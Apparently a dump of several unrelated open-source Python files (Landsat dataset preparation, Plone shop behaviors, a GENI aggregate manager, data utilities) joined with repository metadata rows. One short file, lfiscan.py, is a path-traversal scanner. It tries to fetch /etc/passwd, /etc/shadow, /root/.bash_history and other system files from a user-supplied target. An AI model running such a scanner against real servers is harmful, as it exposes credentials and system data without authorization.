output = shapely.geometry.mapping(geom)
output['coordinates'] = _to_lists(output['coordinates'])
return output
def _to_lists(x):
"""
Returns lists of lists when given tuples of tuples
"""
if isinstance(x, tuple):
return [_to_lists(el) for el in x]
return x
###END IMAGE BOUNDARY CODE
def band_name(path):
name = path.stem
position = name.find('_')
if position == -1:
raise ValueError('Unexpected tif image in eods: %r' % path)
if re.match(r"[Bb]\d+", name[position+1:]):
layername = name[position+2:]
else:
layername = name[position+1:]
return layername
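# Illustrative stems (assumed naming): 'LC80090452014008LGN00_sr_band4' yields
# 'sr_band4', while a stem such as 'scene_B4' drops the band prefix and yields '4'.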
def get_projection(path):
with rasterio.open(str(path)) as img:
left, bottom, right, top = img.bounds
return {
'spatial_reference': str(str(getattr(img, 'crs_wkt', None) or img.crs.wkt)),
'geo_ref_points': {
'ul': {'x': left, 'y': top},
'ur': {'x': right, 'y': top},
'll': {'x': left, 'y': bottom},
'lr': {'x': right, 'y': bottom},
}
}
def get_coords(geo_ref_points, spatial_ref):
spatial_ref = osr.SpatialReference(spatial_ref)
t = osr.CoordinateTransformation(spatial_ref, spatial_ref.CloneGeogCS())
def transform(p):
lon, lat, z = t.TransformPoint(p['x'], p['y'])
return {'lon': lon, 'lat': lat}
return {key: transform(p) for key, p in geo_ref_points.items()}
def populate_coord(doc):
proj = doc['grid_spatial']['projection']
doc['extent']['coord'] = get_coords(proj['geo_ref_points'], proj['spatial_reference'])
def crazy_parse(timestr):
try:
return parser.parse(timestr)
except ValueError:
if not timestr[-2:] == "60":
raise
return parser.parse(timestr[:-2]+'00') + timedelta(minutes=1)
def prep_dataset(fields, path):
images_list = []
for file in os.listdir(str(path)):
if file.endswith(".xml") and (not file.endswith('aux.xml')):
metafile = file
if file.endswith(".tif") and ("band" in file) :
images_list.append(os.path.join(str(path),file))
with open(os.path.join(str(path), metafile)) as f:
xmlstring = f.read()
xmlstring = re.sub(r'\sxmlns="[^"]+"', '', xmlstring, count=1)
doc = ElementTree.fromstring(xmlstring)
satellite = doc.find('.//satellite').text
instrument = doc.find('.//instrument').text
acquisition_date = doc.find('.//acquisition_date').text.replace("-", "")
scene_center_time = doc.find('.//scene_center_time').text[:8]
center_dt = crazy_parse(acquisition_date + "T" + scene_center_time)
aos = crazy_parse(acquisition_date + "T" + scene_center_time) - timedelta(seconds=(24 / 2))
los = aos + timedelta(seconds=24)
lpgs_metadata_file = doc.find('.//lpgs_metadata_file').text
groundstation = lpgs_metadata_file[16:19]
fields.update({'instrument': instrument, 'satellite': satellite})
start_time = aos
end_time = los
images = {band_name(im_path): {
'path': str(im_path.relative_to(path))
} for im_path in path.glob('*.tif')}
projdict = get_projection(path/next(iter(images.values()))['path'])
projdict['valid_data'] = safe_valid_region(images_list)
doc = {
'id': str(uuid.uuid4()),
'processing_level': fields["level"],
'product_type': fields["type"],
'creation_dt': fields["creation_dt"],
'platform': {'code': fields["satellite"]},
'instrument': {'name': fields["instrument"]},
'acquisition': {
'groundstation': {
'name': groundstation,
'aos': str(aos),
'los': str(los)
}
},
'extent': {
'from_dt': str(start_time),
'to_dt': str(end_time),
'center_dt': str(center_dt)
},
'format': {'name': 'GeoTiff'},
'grid_spatial': {
'projection': projdict
},
'image': {
'satellite_ref_point_start': {'path': int(fields["path"]), 'row': int(fields["row"])},
'satellite_ref_point_end': {'path': int(fields["path"]), 'row': int(fields["row"])},
'bands': images
},
'lineage': {'source_datasets': {}}
}
populate_coord(doc)
return doc
def dataset_folder(fields):
fmt_str = "{vehicle}_{instrument}_{type}_{level}_GA{type}{product}-{groundstation}_{path}_{row}_{date}"
return fmt_str.format(**fields)
def prepare_datasets(nbar_path):
fields = re.match(
(
r"(?P<code>LC8|LE7|LT5)"
r"(?P<path>[0-9]{3})"
r"(?P<row>[0-9]{3})"
r"(?P<productyear>[0-9]{4})"
r"(?P<julianday>[0-9]{3})"
), nbar_path.stem).groupdict()
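    # The stem is expected to start like e.g. 'LC80090452014008' (illustrative):
    # code 'LC8', path '009', row '045', product year '2014', julian day '008'.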
timedelta(days=int(fields["julianday"]))
fields.update({'level': 'sr_refl',
'type': 'LEDAPS',
'creation_dt': ((crazy_parse(fields["productyear"]+'0101T00:00:00'))+timedelta(days=int(fields["julianday"])))})
nbar = prep_dataset(fields, nbar_path)
return (nbar, nbar_path)
@click.command(help="Prepare USGS LS dataset for ingestion into the Data Cube.")
@click.argument('datasets',
type=click.Path(exists=True, readable=True, writable=True),
nargs=-1)
def main(datasets):
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
for dataset in datasets:
path = Path(dataset)
logging.info("Processing %s", path)
documents = prepare_datasets(path)
dataset, folder = documents
yaml_path = str(folder.joinpath('agdc-metadata.yaml'))
logging.info("Writing %s", yaml_path)
with open(yaml_path, 'w') as stream:
yaml.dump(dataset, stream)
if __name__ == "__main__":
main()
| apache-2.0 | 6,611,207,923,284,716,000 | 30.908046 | 131 | 0.570725 | false |
3t1n/scripts | Python/LFI-Scan/lfiscan.py | 1 | 1102 | #!/usr/bin/env python
#coding: utf-8
#coded by et1m
__author__ = "et1m"
print' _ ______ _____ _____ _____ _ _ '
print'| | | ____|_ _| / ____|/ ____| /\ | \ | |'
print'| | | |__ | | | (___ | | / \ | \| |'
print'| | | __| | | \___ \| | / /\ \ | . ` |'
print'| |____| | _| |_ ____) | |____ / ____ \| |\ |'
print'|______|_| |_____| |_____/ \_____/_/ \_\_| \_|'
print ''
print ''
import requests
import webbrowser
print 'Use on servers running Linux'
alvo = raw_input("enter your target: ")
print''
cd = raw_input("enter the ../ : ")
print ''
print("Você digitou: " + alvo + cd)
print ''
paginas = ['/etc/passwd','/etc/issue','/proc/version','/etc/profile','/etc/shadow','/root/.bash_history','/var/log/dmessage','/var/mail/root','/var/spool/cron/crontabs/root']
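# Each request below concatenates target + traversal + path, e.g. (illustrative):
#   http://target.example/index.php?page= + ../../../../ + /etc/passwd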
for x in paginas:
check = requests.get(alvo + cd + x)
	if check.status_code == 200: # if the GET succeeds, open the browser with the full URL
webbrowser.open(alvo + cd + x)
| cc0-1.0 | 2,690,219,767,311,702,000 | 31.352941 | 174 | 0.427273 | false |
andreesg/bda.plone.shop | src/bda/plone/shop/dx.py | 1 | 14904 | # -*- coding: utf-8 -*-
from bda.plone.cart import CartItemDataProviderBase
from bda.plone.cart import CartItemPreviewAdapterBase
from bda.plone.cart.interfaces import ICartItemStock
from bda.plone.orders.interfaces import IBuyable
from bda.plone.orders.interfaces import ITrading
from bda.plone.shipping.interfaces import IShippingItem
from bda.plone.shop import message_factory as _
from bda.plone.shop.interfaces import IBuyablePeriod
from bda.plone.shop.mailnotify import BubbleGlobalNotificationText
from bda.plone.shop.mailnotify import BubbleItemNotificationText
from bda.plone.shop.utils import get_shop_article_settings
from bda.plone.shop.utils import get_shop_settings
from bda.plone.shop.utils import get_shop_shipping_settings
from bda.plone.shop.utils import get_shop_tax_settings
from plone.autoform.interfaces import IFormFieldProvider
from plone.dexterity.interfaces import IDexterityContent
from plone.supermodel import model
from zope import schema
from zope.component import adapter
from zope.component import getUtility
from zope.interface import implementer
from zope.interface import provider
from zope.schema.interfaces import IContextAwareDefaultFactory
from zope.schema.interfaces import IVocabularyFactory
@provider(IContextAwareDefaultFactory)
def default_item_net(context):
return get_shop_article_settings().default_item_net
@provider(IContextAwareDefaultFactory)
def default_item_vat(context):
return get_shop_tax_settings().default_item_vat
@provider(IContextAwareDefaultFactory)
def default_item_display_gross(context):
return get_shop_settings().default_item_display_gross
@provider(IContextAwareDefaultFactory)
def item_comment_enabled(context):
return get_shop_article_settings().default_item_comment_enabled
@provider(IContextAwareDefaultFactory)
def default_item_comment_required(context):
return get_shop_article_settings().default_item_comment_required
@provider(IContextAwareDefaultFactory)
def default_item_quantity_unit_float(context):
return get_shop_article_settings().default_item_quantity_unit_float
@provider(IContextAwareDefaultFactory)
def default_item_cart_count_limit(context):
return get_shop_article_settings().default_item_cart_count_limit
@provider(IContextAwareDefaultFactory)
def default_item_quantity_unit(context):
return get_shop_article_settings().default_item_quantity_unit
@provider(IFormFieldProvider)
class IBuyableBehavior(model.Schema, IBuyable):
"""Buyable behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_net',
'item_vat',
'item_cart_count_limit',
'item_display_gross',
'item_comment_enabled',
'item_comment_required',
'item_quantity_unit_float',
'item_quantity_unit'
]
)
item_net = schema.Float(
title=_(u'label_item_net', default=u'Item net price'),
required=False,
defaultFactory=default_item_net
)
item_vat = schema.Choice(
title=_(u'label_item_vat', default=u'Item VAT (in %)'),
vocabulary='bda.plone.shop.vocabularies.VatVocabulary',
required=False,
defaultFactory=default_item_vat
)
item_cart_count_limit = schema.Float(
title=_(u'label_item_cart_count_limit',
default=u'Max count of this item in cart'),
required=False,
defaultFactory=default_item_cart_count_limit
)
item_display_gross = schema.Bool(
title=_(u'label_item_display_gross', default=u'Display Gross Price'),
description=_(u'help_item_display_gross',
default=u'Show price with taxes included'),
required=False,
defaultFactory=default_item_display_gross
)
item_comment_enabled = schema.Bool(
title=_(u'label_item_comment_enabled', default='Comment enabled'),
required=False,
defaultFactory=item_comment_enabled
)
item_comment_required = schema.Bool(
title=_(u'label_item_comment_required', default='Comment required'),
required=False,
defaultFactory=default_item_comment_required
)
item_quantity_unit_float = schema.Bool(
title=_(
u'label_item_quantity_unit_float', default='Quantity as float'),
required=False,
defaultFactory=default_item_quantity_unit_float
)
item_quantity_unit = schema.Choice(
title=_(u'label_item_quantity_unit', default='Quantity unit'),
vocabulary='bda.plone.shop.vocabularies.QuantityUnitVocabulary',
required=False,
defaultFactory=default_item_quantity_unit
)
@adapter(IBuyableBehavior)
class DXCartItemDataProvider(CartItemDataProviderBase):
"""Accessor Interface
"""
@property
def net(self):
val = self.context.item_net
if not val:
return 0.0
return float(val)
@property
def vat(self):
val = self.context.item_vat
if not val:
return 0.0
return float(val)
@property
def cart_count_limit(self):
return self.context.item_cart_count_limit
@property
def display_gross(self):
return self.context.item_display_gross
@property
def comment_enabled(self):
return self.context.item_comment_enabled
@property
def comment_required(self):
return self.context.item_comment_required
@property
def quantity_unit_float(self):
return self.context.item_quantity_unit_float
@property
def quantity_unit(self):
unit = self.context.item_quantity_unit
vocab = getUtility(
IVocabularyFactory,
'bda.plone.shop.vocabularies.QuantityUnitVocabulary')(self.context)
for term in vocab:
if unit == term.value:
return term.title
@provider(IContextAwareDefaultFactory)
def default_item_display_stock(context):
return True
@provider(IContextAwareDefaultFactory)
def default_item_stock_warning_threshold(context):
return get_shop_article_settings().default_item_stock_warning_threshold
@provider(IFormFieldProvider)
class IStockBehavior(model.Schema):
"""Stock behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_display_stock',
'item_available',
'item_overbook',
'item_stock_warning_threshold'
]
)
item_display_stock = schema.Bool(
title=_(u'label_item_display_stock', default=u'Display item stock'),
required=False,
defaultFactory=default_item_display_stock
)
item_available = schema.Float(
title=_(u'label_item_available', default=u'Item stock available'),
required=False
)
item_overbook = schema.Float(
title=_(u'label_item_overbook', default=u'Item stock overbook'),
required=False
)
item_stock_warning_threshold = schema.Float(
title=_(u'label_item_stock_warning_threshold',
default=u'Item stock warning threshold.'),
required=False,
defaultFactory=default_item_stock_warning_threshold
)
@implementer(ICartItemStock)
@adapter(IStockBehavior)
class DXCartItemStock(object):
"""Accessor Interface
"""
def __init__(self, context):
self.context = context
@property
def display(self):
return self.context.item_display_stock
@property
def available(self):
return self.context.item_available
@available.setter
def available(self, value):
self.context.item_available = value
@property
def overbook(self):
return self.context.item_overbook
@overbook.setter
def overbook(self, value):
self.context.item_overbook = value
@property
def stock_warning_threshold(self):
return self.context.item_stock_warning_threshold
@stock_warning_threshold.setter
def stock_warning_threshold(self, value):
self.context.item_stock_warning_threshold = value
@provider(IContextAwareDefaultFactory)
def default_shipping_item_shippable(context):
return get_shop_shipping_settings().default_shipping_item_shippable
@provider(IFormFieldProvider)
class IShippingBehavior(model.Schema):
"""Shipping behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'shipping_item_shippable',
'shipping_item_weight',
'shipping_item_free_shipping'
]
)
shipping_item_shippable = schema.Bool(
title=_(u'label_shipping_item_shippable', default=u'Item Shippable'),
description=_('help_shipping_item_shippable',
default=u'Flag whether item is shippable, i.e. '
u'downloads are not'),
defaultFactory=default_shipping_item_shippable
)
shipping_item_weight = schema.Float(
title=_(u'label_shipping_item_weight', default=u'Item Weight'),
required=False
)
shipping_item_free_shipping = schema.Bool(
title=_(u'label_shipping_item_free_shipping',
default=u'Free Shipping'),
description=_('help_shipping_item_free_shipping',
default=u'Flag whether shipping of this item is free.')
)
@implementer(IShippingItem)
@adapter(IShippingBehavior)
class DXShippingItem(object):
"""Accessor Interface
"""
def __init__(self, context):
self.context = context
@property
def shippable(self):
return self.context.shipping_item_shippable
@property
def weight(self):
return self.context.shipping_item_weight
@property
def free_shipping(self):
return self.context.shipping_item_free_shipping
@adapter(IDexterityContent)
class DXCartItemPreviewImage(CartItemPreviewAdapterBase):
"""Accessor Interface
"""
preview_scale = "tile"
@property
def url(self):
"""Get url of preview image by trying to read the 'image' field on the
context.
"""
img_scale = None
if hasattr(self.context, 'image'):
scales = self.context.restrictedTraverse('@@images')
img_scale = scales.scale("image", scale=self.preview_scale)
return img_scale and img_scale.url or ""
@provider(IFormFieldProvider)
class IItemNotificationTextBehavior(model.Schema):
model.fieldset(
'shop',
label=u"Shop",
fields=[
'order_text',
'overbook_text'])
order_text = schema.Text(
title=_(
u"label_item_notification_text",
default=u"Notification text for this item in the order confirmation "
u"mail"
),
required=False
)
overbook_text = schema.Text(
title=_(
u"label_item_overbook_notification_text",
default=u"Notification text for this item in the order confirmation "
u"mail if item is out of stock"
),
required=False
)
@provider(IFormFieldProvider)
class IGlobalNotificationTextBehavior(model.Schema):
model.fieldset(
'shop',
label=u"Shop",
fields=[
'global_order_text',
'global_overbook_text'])
global_order_text = schema.Text(
title=_(
u"label_item_global_notification_text",
default=u"Additional overall notification text for the order "
u"confirmation mail of this item"
),
required=False
)
global_overbook_text = schema.Text(
title=_(
u"label_item_global_overbook_notification_text",
default=u"Additional overall notification text for the order "
u"confirmation mail of this item ordered if out of stock"
),
required=False
)
@adapter(IItemNotificationTextBehavior)
class DXItemNotificationText(BubbleItemNotificationText):
"""Accessor Interface
"""
@property
def order_text(self):
if self.context.order_text:
return self.context.order_text
return super(DXItemNotificationText, self).order_text
@property
def overbook_text(self):
if self.context.overbook_text:
return self.context.overbook_text
return super(DXItemNotificationText, self).overbook_text
@adapter(IGlobalNotificationTextBehavior)
class DXGlobalNotificationText(BubbleGlobalNotificationText):
"""Accessor Interface
"""
@property
def global_order_text(self):
if self.context.global_order_text:
return self.context.global_order_text
return super(DXGlobalNotificationText, self).global_order_text
@property
def global_overbook_text(self):
if self.context.global_overbook_text:
return self.context.global_overbook_text
return super(DXGlobalNotificationText, self).global_overbook_text
@provider(IFormFieldProvider)
class IBuyablePeriodBehavior(model.Schema):
"""Buyable period behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'buyable_effective',
'buyable_expires'
]
)
buyable_effective = schema.Datetime(
title=_(u'label_buyable_effective_date',
default=u'Buyable effective date'),
required=False
)
buyable_expires = schema.Datetime(
title=_(u'label_buyable_expiration_date',
default=u'Buyable expiration date'),
required=False
)
@implementer(IBuyablePeriod)
@adapter(IBuyablePeriodBehavior)
class DXBuyablePeriod(object):
def __init__(self, context):
self.context = context
@property
def effective(self):
return self.context.buyable_effective
@property
def expires(self):
return self.context.buyable_expires
@provider(IFormFieldProvider)
class ITradingBehavior(model.Schema):
"""Trading behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_number',
'gtin',
]
)
item_number = schema.TextLine(
title=_(u'label_item_number', default=u'Item number'),
description=_(u'help_item_number',
default=u'Buyable Item number'),
required=False)
gtin = schema.TextLine(
title=_(u'label_gtin', default=u'GTIN'),
description=_(u'help_gtin',
default=u'Global Trade Item Number'),
required=False)
@implementer(ITrading)
@adapter(ITradingBehavior)
class DXTrading(object):
def __init__(self, context):
self.context = context
@property
def item_number(self):
return self.context.item_number
@property
def gtin(self):
return self.context.gtin
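# --- Illustrative sketch (not part of the original module) ------------------
# The adapters above are normally obtained by adapting a buyable Dexterity
# item. A minimal helper, assuming ``context`` provides IBuyableBehavior and
# ``item_vat`` holds a percentage value:
def _example_item_gross_price(context):  # pragma: no cover
    """Return the gross price of a buyable item (sketch only)."""
    data = DXCartItemDataProvider(context)
    return data.net * (1.0 + data.vat / 100.0)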
| bsd-3-clause | 5,413,968,990,627,828,000 | 26.651206 | 81 | 0.653784 | false |
drix00/pymcxray | pymcxray/multipleloop.py | 1 | 3786 | #!/usr/bin/env python
"""
This module provides a tool for handling computer experiments with
of a set of input parameters, where each input parameter
is varied in a prescribed fashion.
In short, the parameters are held in a dictionary where the keys are
the names of the parameters and the values are the numerical, string
or other values of the parameters. The value can take on multiple
values: e.g., an integer parameter 'a' can have values -1, 1 and
10. Similarly, a string parameter 'method' can have values 'Newton'
and 'Bisection'. The module will generate all combination of all
parameters and values, which in the mentioned example will be
(-1, 'Newton'), (1, 'Newton'), (10, 'Newton'), (-1, 'Bisection'),
(1, 'Bisection'), and (10, 'Bisection'). Particular combination
of values can easily be removed.
The usage and implementation of the module are documented in the
book "Python Scripting for Computational Science" (H. P. Langtangen,
Springer, 2009), Chapter 12.1.
"""
# see also http://pyslice.sourceforge.net/HomePage
def _outer(a, b):
"""
Return the outer product/combination of two lists.
a is a multi- or one-dimensional list,
b is a one-dimensional list, tuple, NumPy array or scalar (new parameter)
Return: outer combination 'all_combination'.
The function is to be called repeatedly::
all = _outer(all, p)
"""
all_combination = []
if not isinstance(a, list):
raise TypeError('a must be a list')
if isinstance(b, (float,int,complex,str)): b = [b] # scalar?
if len(a) == 0:
# first call:
for j in b:
all_combination.append([j])
else:
for j in b:
for i in a:
if not isinstance(i, list):
raise TypeError('a must be list of list')
# note: i refers to a list; i.append(j) changes
# the underlying list (in a), which is not what
# we want, we need a copy, extend the copy, and
# add to all_combination
k = i + [j] # extend previous prms with new one
all_combination.append(k)
return all_combination
def combine(prm_values):
"""
Compute the combination of all parameter values in the prm_values
(nested) list. Main function in this module.
    :param prm_values: nested list ``(parameter_name, list_of_parameter_values)``
        or dictionary ``prm_values[parameter_name] = list_of_parameter_values``.
    :return: (all, names, varied) where
- all contains all combinations (experiments)
all[i] is the list of individual parameter values in
experiment no i
- names contains a list of all parameter names
- varied holds a list of parameter names that are varied
(i.e. where there is more than one value of the parameter,
the rest of the parameters have fixed values)
Code example:
>>> dx = array([1.0/2**k for k in range(2,5)])
>>> dt = 3*dx; dt = dt[:-1]
>>> p = {'dx': dx, 'dt': dt}
>>> p
{'dt': [ 0.75 , 0.375,], 'dx': [ 0.25 , 0.125 , 0.0625,]}
>>> all, names, varied = combine(p)
>>> all
[[0.75, 0.25], [0.375, 0.25], [0.75, 0.125], [0.375, 0.125],
[0.75, 0.0625], [0.375, 0.0625]]
"""
if isinstance(prm_values, dict):
# turn dict into list [(name,values),(name,values),...]:
prm_values = [(name, prm_values[name]) \
for name in prm_values]
all_combination = []
varied = []
for name, values in prm_values:
all_combination = _outer(all_combination, values)
if isinstance(values, list) and len(values) > 1:
varied.append(name)
names = [name for name, values in prm_values]
return all_combination, names, varied
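if __name__ == '__main__':  # pragma: no cover
    # Illustrative sketch (not part of the original module): combine two
    # parameters and print one dict per generated experiment.
    experiments, names, varied = combine(
        [('method', ['Newton', 'Bisection']), ('a', [-1, 1, 10])])
    print('varied parameters: %s' % varied)
    for experiment in experiments:
        print(dict(zip(names, experiment)))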
| apache-2.0 | -5,109,418,296,811,559,000 | 36.86 | 80 | 0.622557 | false |
oas89/iktomi | iktomi/db/sqla/__init__.py | 1 | 1417 | # -*- coding: utf-8 -*-
import logging
from importlib import import_module
from sqlalchemy import orm, create_engine
from sqlalchemy.orm.query import Query
def multidb_binds(databases, package=None, engine_params=None):
    '''Creates a dictionary to be passed as the `binds` parameter to
    `sqlalchemy.orm.sessionmaker()` from a dictionary mapping a models module
    name to the connection URI that should be used for its models. Each models
    module must have a `metadata` attribute. `package`, when set, must be a
    package or package name common to all models modules.'''
engine_params = engine_params or {}
if not (package is None or isinstance(package, basestring)):
package = getattr(package, '__package__', None) or package.__name__
binds = {}
for ref, uri in databases.items():
md_ref = '.'.join(filter(None, [package, ref]))
md_module = import_module(md_ref)
try:
metadata = md_module.metadata
except AttributeError:
raise ImportError(
'Cannot import name metadata from module {}'.format(md_ref))
engine = create_engine(uri, **engine_params)
# Dot before [name] is required to allow setting logging level etc. for
# all them at once.
engine.logger = logging.getLogger('sqlalchemy.engine.[%s]' % ref)
for table in metadata.sorted_tables:
binds[table] = engine
return binds
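# Illustrative usage (not part of the original module; the module names are
# assumptions):
#
#     binds = multidb_binds({'main': 'sqlite://', 'stats': 'sqlite://'},
#                           package='myapp.models')
#     Session = orm.sessionmaker(binds=binds)
#
# Here ``myapp.models.main`` and ``myapp.models.stats`` must each define a
# ``metadata`` attribute; every table from a module's metadata is bound to
# that module's engine.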
| mit | -3,956,359,092,296,895,000 | 41.939394 | 79 | 0.661962 | false |
plantigrade/geni-tools | src/gcf-am.py | 1 | 9684 | #!/usr/bin/env python
#----------------------------------------------------------------------
# Copyright (c) 2012-2015 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
"""
Framework to run a GENI Aggregate Manager. See geni/am for the
Reference Aggregate Manager that this runs.
Run with "-h" flag to see usage and command line options.
"""
import sys
# Check python version. Requires 2.6 or greater, but less than 3.
if sys.version_info < (2, 6):
raise Exception('Must use python 2.6 or greater.')
elif sys.version_info >= (3,):
raise Exception('Not python 3 ready')
import logging
import optparse
import os
from gcf import geni
import gcf.geni.am
import gcf.geni.am.am2
import gcf.geni.am.am3
from gcf.geni.config import read_config
from gcf.geni.auth.util import getInstanceFromClassname
def parse_args(argv):
parser = optparse.OptionParser()
parser.add_option("-k", "--keyfile",
help="AM key file name", metavar="FILE")
parser.add_option("-g", "--certfile",
help="AM certificate file name (PEM format)", metavar="FILE")
parser.add_option("-c", "--configfile", help="config file path", metavar="FILE")
# Note: The trusted CH certificates are _not_ enough here.
# It needs self signed certificates. EG CA certificates.
parser.add_option("-r", "--rootcadir",
help="Trusted Root certificates directory (files in PEM format)", metavar="FILE")
# Could try to determine the real IP Address instead of the loopback
# using socket.gethostbyname(socket.gethostname())
parser.add_option("-H", "--host",
help="server ip", metavar="HOST")
parser.add_option("-p", "--port", type=int,
help="server port", metavar="PORT")
parser.add_option("--debug", action="store_true", default=False,
help="enable debugging output")
parser.add_option("-V", "--api-version", type=int,
help="AM API Version", default=2)
parser.add_option("-D", "--delegate", metavar="DELEGATE",
help="Classname of aggregate delegate to instantiate (if none, reference implementation is used)")
return parser.parse_args()
def getAbsPath(path):
"""Return None or a normalized absolute path version of the argument string.
Does not check that the path exists."""
if path is None:
return None
if path.strip() == "":
return None
path = os.path.normcase(os.path.expanduser(path))
if os.path.isabs(path):
return path
else:
return os.path.abspath(path)
def main(argv=None):
if argv is None:
argv = sys.argv
opts = parse_args(argv)[0]
level = logging.INFO
if opts.debug:
level = logging.DEBUG
logging.basicConfig(level=level)
# Read in config file options, command line gets priority
optspath = None
if not opts.configfile is None:
optspath = os.path.expanduser(opts.configfile)
config = read_config(optspath)
for (key,val) in config['aggregate_manager'].items():
if hasattr(opts,key) and getattr(opts,key) is None:
setattr(opts,key,val)
if not hasattr(opts,key):
setattr(opts,key,val)
if getattr(opts,'rootcadir') is None:
setattr(opts,'rootcadir',config['global']['rootcadir'])
if opts.rootcadir is None:
sys.exit('Missing path to trusted root certificate directory (-r argument)')
certfile = getAbsPath(opts.certfile)
keyfile = getAbsPath(opts.keyfile)
if not os.path.exists(certfile):
sys.exit("Aggregate certfile %s doesn't exist" % certfile)
if not os.path.getsize(certfile) > 0:
sys.exit("Aggregate certfile %s is empty" % certfile)
if not os.path.exists(keyfile):
sys.exit("Aggregate keyfile %s doesn't exist" % keyfile)
if not os.path.getsize(keyfile) > 0:
sys.exit("Aggregate keyfile %s is empty" % keyfile)
# Instantiate an argument guard that will reject or modify
# arguments and options provided to calls
argument_guard = None
if hasattr(opts, 'argument_guard'):
argument_guard = getInstanceFromClassname(opts.argument_guard)
# Instantiate authorizer from 'authorizer' config argument
# By default, use the SFA authorizer
if hasattr(opts, 'authorizer'):
authorizer_classname = opts.authorizer
else:
authorizer_classname = "gcf.geni.auth.sfa_authorizer.SFA_Authorizer"
authorizer = getInstanceFromClassname(authorizer_classname,
getAbsPath(opts.rootcadir), opts, argument_guard)
# Use XMLRPC authorizer if opt.remote_authorizer is set
if hasattr(opts, 'remote_authorizer'):
import xmlrpclib
authorizer = xmlrpclib.Server(opts.remote_authorizer)
# Instantiate resource manager from 'authorizer_resource_manager'
# config argument. Default = None
resource_manager = None
if hasattr(opts, 'authorizer_resource_manager'):
resource_manager = \
getInstanceFromClassname(opts.authorizer_resource_manager)
delegate=None
if hasattr(opts, 'delegate') and opts.delegate is not None and str(opts.delegate).strip() != "":
try:
delegate = getInstanceFromClassname(opts.delegate,
getAbsPath(opts.rootcadir),
config['global']['base_name'],
"https://%s:%d/" % (opts.host, int(opts.port)),
**vars(opts)
)
except AttributeError, e:
msg = "Could not create delegate from name '%s': probably not a valid python class name. " % opts.delegate
msg += e.message
logging.getLogger('gcf-am').error(msg)
sys.exit(msg)
# here rootcadir is supposed to be a single file with multiple
# certs possibly concatenated together
comboCertsFile = geni.CredentialVerifier.getCAsFileFromDir(getAbsPath(opts.rootcadir))
if opts.api_version == 1:
# rootcadir is dir of multiple certificates
delegate = geni.ReferenceAggregateManager(getAbsPath(opts.rootcadir))
ams = geni.AggregateManagerServer((opts.host, int(opts.port)),
delegate=delegate,
keyfile=keyfile,
certfile=certfile,
ca_certs=comboCertsFile,
base_name=config['global']['base_name'])
elif opts.api_version == 2:
ams = gcf.geni.am.am2.AggregateManagerServer((opts.host, int(opts.port)),
keyfile=keyfile,
certfile=certfile,
trust_roots_dir=getAbsPath(opts.rootcadir),
ca_certs=comboCertsFile,
base_name=config['global']['base_name'],
authorizer=authorizer,
resource_manager=resource_manager,
delegate=delegate)
elif opts.api_version == 3:
ams = gcf.geni.am.am3.AggregateManagerServer((opts.host, int(opts.port)),
keyfile=keyfile,
certfile=certfile,
trust_roots_dir=getAbsPath(opts.rootcadir),
ca_certs=comboCertsFile,
base_name=config['global']['base_name'],
authorizer=authorizer,
resource_manager=resource_manager,
delegate=delegate)
else:
msg = "Unknown API version: %d. Valid choices are \"1\", \"2\", or \"3\""
sys.exit(msg % (opts.api_version))
logging.getLogger('gcf-am').info('GENI AM (v%s) Listening on port %s...' % (opts.api_version, opts.port))
ams.serve_forever()
if __name__ == "__main__":
sys.exit(main())
| mit | 8,550,566,515,008,584,000 | 44.679245 | 120 | 0.573627 | false |
vkuznet/rep | rep/data/storage.py | 1 | 5284 | """
This is wrapper for pandas.DataFrame, which allows you to define dataset for estimator in a simple way.
"""
from __future__ import division, print_function, absolute_import
import numbers
from numpy.random.mtrand import RandomState
import pandas
import numpy
from sklearn.utils import check_random_state
from ..utils import get_columns_dict, get_columns_in_df
# generating random seeds in the interval [0, RANDINT)
RANDINT = 10000000
class LabeledDataStorage(object):
"""
    This class implements the data interface for estimator training. It contains data, labels and
    weights - all the information needed to train a model.
Parameters:
-----------
:param pandas.DataFrame ds: data
:param target: labels for classification and values for regression (set None for predict methods)
:type target: None or numbers.Number or array-like
:param sample_weight: weight (set None for predict methods)
:type sample_weight: None or numbers.Number or array-like
:param random_state: for pseudo random generator
:type random_state: None or int or RandomState
:param bool shuffle: shuffle or not data
"""
def __init__(self, data, target=None, sample_weight=None, random_state=None, shuffle=False):
self.data = data
self.target = self._get_key(self.data, target)
self.sample_weight = self._get_key(self.data, sample_weight, allow_nones=True)
assert len(self.data) == len(self.target), 'ERROR: Lengths are different for data and target'
if self.sample_weight is not None:
assert len(self.data) == len(self.sample_weight), 'ERROR: Lengths are different for data and sample_weight'
self._random_state = check_random_state(random_state).randint(RANDINT)
self.shuffle = shuffle
self._indices = None
def _get_key(self, ds, key, allow_nones=False):
"""
Get data from ds by key
:param pandas.DataFrame ds: data
:param key: what data get from ds
:type key: None or numbers.Number or array-like
:return: key data
"""
if isinstance(key, str) and ds is not None:
# assert key in set(ds.columns), self._print_err('ERROR:', '%s is absent in data storage' % key)
name = list(get_columns_dict([key]).keys())[0]
return numpy.array(get_columns_in_df(self.data, [key])[name])
elif isinstance(key, numbers.Number):
return numpy.array([key] * len(ds))
else:
if not allow_nones:
return numpy.array(key) if key is not None else numpy.ones(len(ds))
else:
return numpy.array(key) if key is not None else key
def __len__(self):
"""
